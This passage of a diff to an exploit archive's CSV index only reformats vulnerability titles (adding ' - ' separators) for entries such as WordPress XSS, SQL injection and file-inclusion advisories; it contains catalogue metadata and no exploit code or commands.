Bypass",2004-12-16,"Daniel Fabian",php,remote,0 24986,platforms/cgi/webapps/24986.txt,"Ikonboard 3.x - Multiple Remote SQL Injection Vulnerabilities",2004-12-16,anonymous,cgi,webapps,0 24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Remote Arbitrary Script Upload Vulnerability",2004-12-16,"Jeremy Bae",php,webapps,0 -24988,platforms/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 /wp-admin/post.php content Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 -24989,platforms/php/webapps/24989.txt,"WordPress 1.2.1/1.2.2 /wp-admin/templates.php file Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 -24990,platforms/php/webapps/24990.txt,"WordPress 1.2.1/1.2.2 link-add.php Multiple Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 -24991,platforms/php/webapps/24991.txt,"WordPress 1.2.1/1.2.2 link-categories.php cat_id Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 -24992,platforms/php/webapps/24992.txt,"WordPress 1.2.1/1.2.2 link-manager.php Multiple Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 -24993,platforms/php/webapps/24993.txt,"WordPress 1.2.1/1.2.2 moderation.php item_approved Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 +24988,platforms/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 - /wp-admin/post.php content Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 +24989,platforms/php/webapps/24989.txt,"WordPress 1.2.1/1.2.2 - /wp-admin/templates.php file Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 +24990,platforms/php/webapps/24990.txt,"WordPress 1.2.1/1.2.2 - link-add.php Multiple Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 +24991,platforms/php/webapps/24991.txt,"WordPress 1.2.1/1.2.2 - link-categories.php cat_id Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 +24992,platforms/php/webapps/24992.txt,"WordPress 1.2.1/1.2.2 - link-manager.php Multiple Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 +24993,platforms/php/webapps/24993.txt,"WordPress 1.2.1/1.2.2 - moderation.php item_approved Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 24994,platforms/php/webapps/24994.txt,"MediaWiki 1.3.x - Remote Arbitrary Script Upload Vulnerability",2004-12-16,"Jeremy Bae",php,webapps,0 24995,platforms/multiple/remote/24995.txt,"DXFScope 0.2 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",multiple,remote,0 24996,platforms/windows/remote/24996.rb,"SAP ConfigServlet Remote Unauthenticated Payload Execution",2013-04-25,"Andras Kabai",windows,remote,0 @@ -22147,7 +22147,7 @@ id,file,description,date,author,platform,type,port 25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 Nav.PHP3 - Cross-Site Scripting Vulnerability",2005-03-03,benjilenoob,php,webapps,0 25186,platforms/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension SQL Injection Vulnerability",2005-03-03,"Fabian Becker",php,webapps,0 25187,platforms/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x - Directory Traversal Vulnerability",2005-03-03,"Kristof Philipsen",windows,remote,0 -25188,platforms/windows/remote/25188.txt,"Opera 7.x_ Firefox 1.0_ Internet Explorer 6.0 Information Disclosure Weakness",2005-02-19,upken,windows,remote,0 +25188,platforms/windows/remote/25188.txt,"Opera 7.x_ Firefox 1.0_ Internet Explorer 6.0 - Information Disclosure Weakness",2005-02-19,upken,windows,remote,0 25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - Arbitrary Remote PHP File Include Vulnerability",2005-03-04,"Filip Groszynski",php,webapps,0 25190,platforms/multiple/remote/25190.txt,"ca3de Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote,0 25191,platforms/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow Vulnerability",2005-03-07,"Luigi Auriemma",multiple,remote,0 @@ -22292,7 +22292,7 @@ id,file,description,date,author,platform,type,port 25134,platforms/linux/local/25134.c,"sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0 25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) Cross-Site Scripting Vulnerability",2013-05-01,demonalex,windows,dos,0 25136,platforms/php/remote/25136.rb,"phpMyAdmin Authenticated Remote Code Execution via preg_replace()",2013-05-01,metasploit,php,remote,0 -25137,platforms/php/remote/25137.rb,"Wordpress W3 Total Cache PHP Code Execution",2013-05-01,metasploit,php,remote,0 +25137,platforms/php/remote/25137.rb,"Wordpress W3 Total Cache - PHP Code Execution",2013-05-01,metasploit,php,remote,0 25138,platforms/hardware/webapps/25138.txt,"D-Link IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 25139,platforms/hardware/webapps/25139.txt,"Vivotek IP Cameras Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 25140,platforms/windows/dos/25140.txt,"WPS Office Wpsio.dll - Stack Buffer Overflow Vulnerability",2013-05-01,Zhangjiantao,windows,dos,0 @@ -22826,7 +22826,7 @@ id,file,description,date,author,platform,type,port 25679,platforms/php/webapps/25679.txt,"JGS-Portal 3.0.1/3.0.2 jgs_portal_sponsor.php id Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 25680,platforms/windows/dos/25680.txt,"War Times Remote Game Server Denial of Service Vulnerability",2005-05-17,"Luigi Auriemma",windows,dos,0 25681,platforms/php/webapps/25681.php,"FusionPHP Fusion News 3.3/3.6 X-ForwordedFor PHP Script Code Injection Vulnerability",2005-05-24,"Network security team",php,webapps,0 -25682,platforms/php/webapps/25682.txt,"Wordpress 1.5 Post.PHP Cross-Site Scripting Vulnerability",2005-05-17,"Thomas Waldegger",php,webapps,0 +25682,platforms/php/webapps/25682.txt,"Wordpress 1.5 - Post.PHP Cross-Site Scripting Vulnerability",2005-05-17,"Thomas Waldegger",php,webapps,0 25683,platforms/php/webapps/25683.txt,"Help Center Live 1.0/1.2.x - Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",php,webapps,0 25684,platforms/hardware/remote/25684.html,"D-Link DSL Router Remote Authentication Bypass Vulnerability",2005-05-19,"Francesco Orro",hardware,remote,0 25685,platforms/jsp/webapps/25685.txt,"Sun JavaMail 1.3 API MimeMessage Infromation Disclosure Vulnerability",2005-05-19,"Ricky Latt",jsp,webapps,0 @@ -23643,9 +23643,9 @@ id,file,description,date,author,platform,type,port 26509,platforms/cgi/webapps/26509.txt,"Walla TeleSite 3.0 ts.cgi File Existence Enumeration",2005-11-15,"Rafi Nahum",cgi,webapps,0 26510,platforms/php/webapps/26510.txt,"Pearl Forums 2.0 Index.PHP Multiple SQL Injection Vulnerabilities",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 26511,platforms/php/webapps/26511.txt,"Pearl Forums 2.0 Index.PHP Local File Include Vulnerability",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 -26512,platforms/php/webapps/26512.txt,"phpwcms 1.2.5 -DEV login.php form_lang Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 -26513,platforms/php/webapps/26513.txt,"phpwcms 1.2.5 -DEV random_image.php imgdir Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 -26514,platforms/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",php,webapps,0 +26512,platforms/php/webapps/26512.txt,"phpwcms 1.2.5 -DEV - login.php form_lang Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 +26513,platforms/php/webapps/26513.txt,"phpwcms 1.2.5 -DEV - random_image.php imgdir Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 +26514,platforms/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",php,webapps,0 26515,platforms/php/webapps/26515.txt,"AlstraSoft Template Seller Pro 3.25 - Remote File Include Vulnerability",2005-11-15,"Robin Verton",php,webapps,0 26516,platforms/php/webapps/26516.txt,"Ekinboard 1.0.3 Profile.PHP Cross-Site Scripting Vulnerability",2005-11-15,trueend5,php,webapps,0 26517,platforms/windows/dos/26517.txt,"Microsoft Office PowerPoint 2007 - Crash PoC",2013-07-01,Asesino04,windows,dos,0 @@ -23989,7 +23989,7 @@ id,file,description,date,author,platform,type,port 26863,platforms/cgi/webapps/26863.txt,"ScareCrow 2.13 post.cgi forum Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 26864,platforms/cgi/webapps/26864.txt,"WebGlimpse 2.x - Cross-Site Scripting Vulnerability",2005-12-16,r0t3d3Vil,cgi,webapps,0 26865,platforms/cgi/webapps/26865.txt,"WebCal 3.0 4 webcal.cgi Multiple Parameter XSS",2005-12-16,"Stan Bubrouski",cgi,webapps,0 -26866,platforms/php/webapps/26866.txt,"Round Cube Webmail 0.1 -20051021 Path Disclosure Weakness",2005-12-17,king_purba,php,webapps,0 +26866,platforms/php/webapps/26866.txt,"Round Cube Webmail 0.1 -20051021 - Path Disclosure Weakness",2005-12-17,king_purba,php,webapps,0 26867,platforms/php/webapps/26867.txt,"PHP Fusebox 3.0 Index.PHP Cross-Site Scripting Vulnerability",2005-12-19,"bogel and lukman",php,webapps,0 26868,platforms/php/webapps/26868.txt,"JPortal 2.2.1/2.3 Forum Forum.PHP SQL Injection Vulnerability",2005-12-19,Zbigniew,php,webapps,0 26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 Unspecified Memory Corruption Vulnerabilities",2005-12-19,ad@heapoverflow.com,windows,dos,0 @@ -24224,7 +24224,7 @@ id,file,description,date,author,platform,type,port 27092,platforms/php/webapps/27092.txt,"GTP iCommerce Multiple Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,php,webapps,0 27093,platforms/php/webapps/27093.txt,"EZDatabase 2.1.1 Index.PHP Cross-Site Scripting Vulnerability",2006-01-16,"Josh Zlatin-Amishav",php,webapps,0 27094,platforms/multiple/dos/27094.txt,"AmbiCom Blue Neighbors 2.50 build 2500 Bluetooth Stack Object Push Buffer Overflow Vulnerability",2006-01-16,"Kevin Finisterre",multiple,dos,0 -27095,platforms/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS",2006-01-16,"Oliver Karow",multiple,remote,0 +27095,platforms/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - Sample Script cal2.jsp time Parameter XSS",2006-01-16,"Oliver Karow",multiple,remote,0 27096,platforms/multiple/remote/27096.txt,"Apache Geronimo 1.0 Error Page XSS",2006-01-16,"Oliver Karow",multiple,remote,0 27097,platforms/php/webapps/27097.txt,"phpXplorer 0.9.33 Workspaces.PHP Directory Traversal Vulnerability",2006-01-16,"Oriol Torrent Santiago",php,webapps,0 27098,platforms/php/webapps/27098.txt,"RedKernel Referrer Tracker 1.1.0-3 - Rkrt_stats.php Cross-Site Scripting Vulnerability",2006-01-16,Preddy,php,webapps,0 @@ -24279,7 +24279,7 @@ id,file,description,date,author,platform,type,port 27147,platforms/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,php,webapps,0 27148,platforms/php/webapps/27148.txt,"Nuked-klaN 1.7 Index.PHP Cross-Site Scripting Vulnerability",2006-01-30,night_warrior771,php,webapps,0 27149,platforms/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 - Cross-Site Scripting Vulnerability",2006-01-30,0o_zeus_o0,php,webapps,0 -27150,platforms/linux/remote/27150.txt,"Mozilla Firefox 1.0/1.5 XBL -MOZ-BINDING Property Cross-Domain Scripting Vulnerability",2006-01-30,"Chris Thomas",linux,remote,0 +27150,platforms/linux/remote/27150.txt,"Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting Vulnerability",2006-01-30,"Chris Thomas",linux,remote,0 27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 Userlogin.ASP SQL Injection Vulnerability",2006-01-30,preben@watchcom.no,asp,webapps,0 27152,platforms/php/webapps/27152.txt,"BrowserCRM - Results.PHP Cross-Site Scripting Vulnerability",2006-01-31,preben@watchcom.no,php,webapps,0 27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 Clients.PHP Cross-Site Scripting Vulnerability",2006-01-31,preben@watchcom.no,php,webapps,0 @@ -24355,7 +24355,7 @@ id,file,description,date,author,platform,type,port 27224,platforms/php/webapps/27224.txt,"Dotproject 2.0 /modules/public/date_format.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 27225,platforms/php/webapps/27225.txt,"Dotproject 2.0 /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 PMLite.PHP SQL Injection Vulnerability",2006-02-14,"Hamid Ebadi",php,webapps,0 -27227,platforms/php/webapps/27227.txt,"WordPress 2.0 Comment Post HTML Injection Vulnerability",2006-02-15,imei,php,webapps,0 +27227,platforms/php/webapps/27227.txt,"WordPress 2.0 - Comment Post HTML Injection Vulnerability",2006-02-15,imei,php,webapps,0 27228,platforms/php/webapps/27228.txt,"Mantis 0.x/1.0 view_all_set.php Multiple Parameter XSS",2006-02-15,"Thomas Waldegger",php,webapps,0 27229,platforms/php/webapps/27229.txt,"Mantis 0.x/1.0 manage_user_page.php sort Parameter XSS",2006-02-15,"Thomas Waldegger",php,webapps,0 27230,platforms/php/webapps/27230.txt,"My Blog 1.63 BBCode HTML Injection Vulnerability",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24861,7 +24861,7 @@ id,file,description,date,author,platform,type,port 27752,platforms/unix/remote/27752.rb,"Graphite Web Unsafe Pickle Handling",2013-08-21,metasploit,unix,remote,0 27753,platforms/hardware/webapps/27753.txt,"Samsung DVR Firmware 1.10 - Authentication Bypass",2013-08-21,"Andrea Fabrizi",hardware,webapps,80 27754,platforms/windows/remote/27754.txt,"Oracle Java BytePackedRaster.verify() Signed Integer Overflow",2013-08-21,"Packet Storm",windows,remote,0 -27755,platforms/windows/webapps/27755.txt,"Adobe ColdFusion 9 Administrative Login Bypass",2013-08-21,"Scott Buckel",windows,webapps,0 +27755,platforms/windows/webapps/27755.txt,"Adobe ColdFusion 9 - Administrative Login Bypass",2013-08-21,"Scott Buckel",windows,webapps,0 27756,platforms/hardware/webapps/27756.txt,"Sitecom N300/N600 Devices - Multiple Vulnerabilities",2013-08-21,"Roberto Paleari",hardware,webapps,0 27757,platforms/asp/webapps/27757.txt,"DUclassified Detail.ASP SQL Injection Vulnerability",2006-04-28,sadegh.sarshogh,asp,webapps,0 27758,platforms/windows/remote/27758.txt,"ezb systems ultraiso 8.0.1392 - Directory Traversal Vulnerability",2006-04-28,Sowhat,windows,remote,0 @@ -24893,7 +24893,7 @@ id,file,description,date,author,platform,type,port 27782,platforms/php/webapps/27782.txt,"TextFileBB 1.0.16 - Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,php,webapps,0 27783,platforms/php/webapps/27783.txt,"W-Agora 4.2 BBCode Script Injection Vulnerability",2006-04-29,r0xes,php,webapps,0 27784,platforms/php/webapps/27784.txt,"PlanetGallery Gallery_admin.PHP Authentication Bypass Vulnerability",2006-04-29,tugr@,php,webapps,0 -27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b Kopf.PHP Remote File Include Vulnerability",2006-05-01,beford,php,webapps,0 +27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b Kopf.PHP - Remote File Include Vulnerability",2006-05-01,beford,php,webapps,0 27786,platforms/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 Mod KB_constants.PHP Remote File Include Vulnerability",2006-05-01,[Oo],php,webapps,0 27787,platforms/php/webapps/27787.txt,"MaxTrade 1.0.1 - Multiple SQL Injection Vulnerabilities",2006-05-01,r0t,php,webapps,0 27788,platforms/php/webapps/27788.txt,"OrbitHYIP 2.0 signup.php referral Parameter XSS",2006-05-01,r0t,php,webapps,0 @@ -25081,7 +25081,7 @@ id,file,description,date,author,platform,type,port 27983,platforms/php/webapps/27983.txt,"MyBulletinBoard 1.1.2 - Private.PHP Cross-Site Scripting Vulnerability",2006-06-06,o.y.6,php,webapps,0 27984,platforms/windows/remote/27984.txt,"Microsoft DXImageTransform.Microsoft.Light ActiveX Control Remote Code Execution Vulnerability",2006-06-13,"Will Dormann",windows,remote,0 27985,platforms/php/webapps/27985.txt,"AZ Photo Album Script Pro Cross-Site Scripting Vulnerability",2006-05-23,Luny,php,webapps,0 -27986,platforms/windows/remote/27986.html,"Internet Explorer 5.5/6.0/7.0 JavaScript Key Filtering Vulnerability",2006-06-06,"Jesse Ruderman",windows,remote,0 +27986,platforms/windows/remote/27986.html,"Microsoft Internet Explorer 5.5/6.0/7.0 - JavaScript Key Filtering Vulnerability",2006-06-06,"Jesse Ruderman",windows,remote,0 27987,platforms/linux/remote/27987.html,"Firefox 1.x JavaScript Key Filtering Vulnerability",2006-06-06,"Jesse Ruderman",linux,remote,0 27988,platforms/php/webapps/27988.py,"MiraksGalerie 2.62 galimage.lib.php listconfigfile[0] Parameter Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps,0 27989,platforms/php/webapps/27989.txt,"MiraksGalerie 2.62 galsecurity.lib.php listconfigfile[0] Parameter Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps,0 @@ -25357,9 +25357,9 @@ id,file,description,date,author,platform,type,port 28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0 28293,platforms/multiple/dos/28293.txt,"Oracle 10g Alter Session Integer Overflow Vulnerability",2006-07-27,"putosoft softputo",multiple,dos,0 28294,platforms/php/webapps/28294.txt,"PHPNuke INP Modules.PHP Cross-Site Scripting Vulnerability",2006-07-28,l2odon,php,webapps,0 -28295,platforms/php/webapps/28295.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla wp-comments-post.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 -28296,platforms/php/webapps/28296.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla wp-feed.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 -28297,platforms/php/webapps/28297.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla wp-trackback.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 +28295,platforms/php/webapps/28295.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla wp-comments-post.php - Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 +28296,platforms/php/webapps/28296.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla wp-feed.php - Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 +28297,platforms/php/webapps/28297.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla wp-trackback.php - Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 28298,platforms/windows/remote/28298.txt,"Yahoo! Messenger 7.0/7.5 - Remote Search String Arbitrary Browser Navigation Vulnerability",2006-07-28,"Ivan Ivan",windows,remote,0 28299,platforms/windows/dos/28299.pl,"Microsoft Windows XP/2000/2003 Graphical Device Interface Plus Library Denial of Service Vulnerability",2006-07-29,"Mr. Niega",windows,dos,0 28300,platforms/php/webapps/28300.txt,"Advanced Webhost Billing System 2.2.2 Contact.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-07-29,newbinaryfile,php,webapps,0 @@ -25443,7 +25443,7 @@ id,file,description,date,author,platform,type,port 28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 Install3.PHP Remote File Include Vulnerability",2006-08-10,"Philipp Niedziela",php,webapps,0 28380,platforms/linux/dos/28380.txt,"Mozilla Firefox 1.0.x JavaScript Handler Race Condition Memory Corruption Vulnerability",2006-08-12,"Michal Zalewski",linux,dos,0 28381,platforms/windows/dos/28381.txt,"Microsoft windows xp/2000/2003 help Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos,0 -28382,platforms/php/webapps/28382.txt,"WP-DB Backup For Wordpress 1.6/1.7 Edit.PHP Directory Traversal Vulnerability",2006-08-14,"marc & shb",php,webapps,0 +28382,platforms/php/webapps/28382.txt,"WP-DB Backup For Wordpress 1.6/1.7 Edit.PHP - Directory Traversal Vulnerability",2006-08-14,"marc & shb",php,webapps,0 28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x SGI Image File Remote Heap Buffer Overflow Vulnerability",2006-08-14,"Damian Put",linux,dos,0 28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 @@ -25529,7 +25529,7 @@ id,file,description,date,author,platform,type,port 28460,platforms/php/webapps/28460.txt,"ezContents 2.0.3 review_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28461,platforms/php/webapps/28461.txt,"ezContents 2.0.3 - search.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28462,platforms/php/webapps/28462.txt,"ezContents 2.0.3 toprated.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28469,platforms/windows/dos/28469.txt,"Internet Security Systems 3.6 BlackICE Local Denial of Service Vulnerability",2006-09-01,"David Matousek",windows,dos,0 +28469,platforms/windows/dos/28469.txt,"Internet Security Systems 3.6 BlackICE - Local Denial of Service Vulnerability",2006-09-01,"David Matousek",windows,dos,0 28470,platforms/php/webapps/28470.txt,"VBZoom 1.11 Profile.PHP Cross-Site Scripting Vulnerability",2006-09-01,Crack_MaN,php,webapps,0 28471,platforms/php/webapps/28471.txt,"ToendaCMS 0.x/1.0.x - Remote File Include Vulnerability",2006-09-01,h4ck3riran,php,webapps,0 28472,platforms/php/webapps/28472.txt,"Papoo CMS 3.2 IBrowser Remote File Include Vulnerability",2006-09-01,Ironfist,php,webapps,0 @@ -25860,7 +25860,7 @@ id,file,description,date,author,platform,type,port 28814,platforms/php/webapps/28814.txt,"RamaCMS ADODB.Inc.PHP Remote File Include Vulnerability",2006-10-13,"Le CoPrA",php,webapps,0 28815,platforms/php/webapps/28815.txt,"H-Sphere 2.x WebShell Login.PHP Cross-Site Scripting Vulnerability",2006-10-14,b0rizQ,php,webapps,0 28816,platforms/linux/dos/28816.txt,"KMail 1.x HTML Element Handling Denial of Service Vulnerability",2006-10-16,nnp,linux,dos,0 -28817,platforms/multiple/local/28817.txt,"Internet Security Systems 3.6 ZWDeleteFile Function Arbitrary File Deletion Vulnerability",2006-10-16,"Matousec Transparent security",multiple,local,0 +28817,platforms/multiple/local/28817.txt,"Internet Security Systems 3.6 = ZWDeleteFile Function Arbitrary File Deletion Vulnerability",2006-10-16,"Matousec Transparent security",multiple,local,0 28818,platforms/php/webapps/28818.txt,"Mambo MostlyCE 4.5.4 HTMLTemplate.PHP Remote File Include Vulnerability",2006-10-16,The_BeKiR,php,webapps,0 28819,platforms/php/webapps/28819.txt,"Lodel CMS 0.7.3 Calcul-Page.PHP Remote File Include Vulnerability",2006-10-17,The_BeKiR,php,webapps,0 28820,platforms/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 Index.PHP Cross-Site Scripting Vulnerability",2006-10-17,Lostmon,php,webapps,0 @@ -26022,7 +26022,7 @@ id,file,description,date,author,platform,type,port 28977,platforms/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 28978,platforms/ios/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass Vulnerability",2013-10-15,Vulnerability-Lab,ios,webapps,0 28979,platforms/linux/webapps/28979.txt,"DornCMS Application 1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,linux,webapps,0 -28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 Functions.PHP Remote File Include Vulnerability",2006-11-11,_ANtrAX_,php,webapps,0 +28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 Functions.PHP - Remote File Include Vulnerability",2006-11-11,_ANtrAX_,php,webapps,0 28981,platforms/multiple/remote/28981.txt,"IBM WebSphere 6.0 Faultactor Cross-Site Scripting Vulnerability",2006-11-13,"Nuri Fattah",multiple,remote,0 28982,platforms/php/webapps/28982.txt,"cPanel 10 seldir.html dir Parameter XSS",2006-11-13,"Aria-Security Team",php,webapps,0 28983,platforms/php/webapps/28983.txt,"cPanel 10 newuser.html Multiple Parameter XSS",2006-11-13,"Aria-Security Team",php,webapps,0 @@ -26114,7 +26114,7 @@ id,file,description,date,author,platform,type,port 29148,platforms/windows/dos/29148.txt,"ASF Demux for VLC 2.0.x - DoS (POC)",2013-10-23,"Pedro Ribeiro",windows,dos,0 29221,platforms/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 Admin.PL Cross-Site Scripting Vulnerability",2006-12-04,"Jesus Olmos Gonzalez",cgi,webapps,0 29222,platforms/php/webapps/29222.txt,"Cerberus Helpdesk 2.x Spellwin.PHP Cross-Site Scripting Vulnerability",2006-12-04,"En Douli",php,webapps,0 -29068,platforms/php/webapps/29068.txt,"WordPress Area53 theme Arbitrary File Upload Vulnerability",2013-10-19,"Byakuya Kouta",php,webapps,80 +29068,platforms/php/webapps/29068.txt,"WordPress Area53 theme - Arbitrary File Upload Vulnerability",2013-10-19,"Byakuya Kouta",php,webapps,80 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 HIPS Driver (kmxfw.sys) Local Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 HIPS Driver (kmxstart.sys) Local Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 29071,platforms/php/webapps/29071.txt,"CPanel 10 DNSlook.HTML Cross-Site Scripting Vulnerability",2006-11-17,"Aria-Security Team",php,webapps,0 @@ -26370,7 +26370,7 @@ id,file,description,date,author,platform,type,port 29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0 29473,platforms/linux/dos/29473.txt,"Squid Proxy 2.5/2.6 FTP URI Remote Denial of Service Vulnerability",2007-01-16,"David Duncan Ross Palmer",linux,dos,0 29474,platforms/php/webapps/29474.txt,"Scriptme SmE 1.21 File Mailer Login SQL Injection Vulnerability",2007-01-16,CorryL,php,webapps,0 -29356,platforms/php/webapps/29356.txt,"Wordpress 1.x/2.0.x Template.PHP HTML Injection Vulnerability",2006-12-27,"David Kierznowski",php,webapps,0 +29356,platforms/php/webapps/29356.txt,"Wordpress 1.x/2.0.x - Template.PHP HTML Injection Vulnerability",2006-12-27,"David Kierznowski",php,webapps,0 29357,platforms/asp/webapps/29357.txt,"Hosting Controller 7C FolderManager.ASPX Directory Traversal Vulnerability",2006-12-27,KAPDA,asp,webapps,0 29358,platforms/asp/webapps/29358.txt,"DMXReady Secure Login Manager 1.0 login.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 29359,platforms/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 content.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 @@ -26518,7 +26518,7 @@ id,file,description,date,author,platform,type,port 30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow/SEH Buffer Overflow/DEP Bypass with ROP",2013-12-04,metacom,windows,local,0 30085,platforms/linux/webapps/30085.txt,"Zimbra - Privilegie Escalation via LFI (0day)",2013-12-06,rubina119,linux,webapps,0 30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injection Vulnerabilities",2007-05-14,"Jesper Jurcenoks",php,webapps,0 -30036,platforms/php/webapps/30036.html,"WordPress 2.1.3 Akismet Plugin Unspecified Vulnerability",2007-05-14,"David Kierznowski",php,webapps,0 +30036,platforms/php/webapps/30036.html,"WordPress 2.1.3 - Akismet Plugin Unspecified Vulnerability",2007-05-14,"David Kierznowski",php,webapps,0 30037,platforms/windows/remote/30037.txt,"Caucho Resin 3.1 Encoded Space (%20) Request Path Disclosure",2007-05-15,"Derek Abdine",windows,remote,0 30038,platforms/windows/remote/30038.txt,"Caucho Resin 3.1 \web-inf Traversal Arbitrary File Access",2007-05-15,"Derek Abdine",windows,remote,0 30039,platforms/multiple/local/30039.txt,"Multiple Personal Firewall Products - Local Protection Mechanism Bypass Vulnerability",2007-05-15,"Matousec Transparent security",multiple,local,0 @@ -26564,7 +26564,7 @@ id,file,description,date,author,platform,type,port 29519,platforms/php/webapps/29519.txt,"Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability",2013-11-08,"Marcela Benetrix",php,webapps,80 29520,platforms/linux/dos/29520.txt,"GTK2 GDKPixBufLoader - Remote Denial of Service Vulnerability",2007-01-24,"Lubomir 